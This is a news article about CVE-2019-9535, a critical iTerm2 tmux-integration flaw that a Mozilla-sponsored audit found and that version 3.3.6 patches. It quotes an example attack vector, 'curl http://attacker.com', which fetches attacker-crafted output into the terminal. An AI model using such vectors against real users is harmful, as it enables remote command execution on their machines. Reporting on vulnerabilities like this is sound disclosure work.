Yesterday, Mozilla announced that a critical security vulnerability is present in the terminal multiplexer (tmux) integration feature in all the versions of iTerm2, the GPL-licensed terminal emulator for macOS.
The security vulnerability was found by a sponsored security audit conducted by the Mozilla Open Source Support Program (MOSS) which delivers security audits for open source technologies. Mozilla and the iTerm2’s developer George Nachman have together developed and released a patch for the vulnerability in the iTerm2 version 3.3.6.
According to the official blog post, MOSS sponsored the iTerm2 security audit due to its popularity among developers and system administrators. Another major reason was the iTerm2’s processing of untrusted data. Radically Open Security (ROS), the firm that conducted the audit, has ascertained that this vulnerability was present in iTerm2 for the last 7 years.
An attacker can exploit this vulnerability (CVE-2019-9535) by producing a malicious output to the terminal using commands on the targeted user’s computer or by remotely executing arbitrary commands with the privileges of the targeted user. Tom Ritter of Mozilla says, “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.”
Nachman says that this is a serious vulnerability because “in some circumstances, it could allow an attacker to execute commands on your machine when you view a file or otherwise receive input they have crafted in iTerm2.” He also strongly recommended all the users to upgrade their iTerm2 to the latest 3.3.6 version.
The CERT Coordination Center has pointed out that since the tmux integration cannot be disabled through configuration, the complete resolution to this vulnerability is not yet available.
Users have appreciated both Mozilla and the iTerm2 team for the security update.
A user commented on Hacker News, “I checked for update, installed and relaunched… and found that all my tabs were exactly as they were before, including my tab that had an ssh tunnel running. The only thing that changed was that iTerm got more secure. Impressive work, Nachman.”
Another user says, “Thank you, Mozilla. =)”
Visit the Mozilla blog for more details about the vulnerability.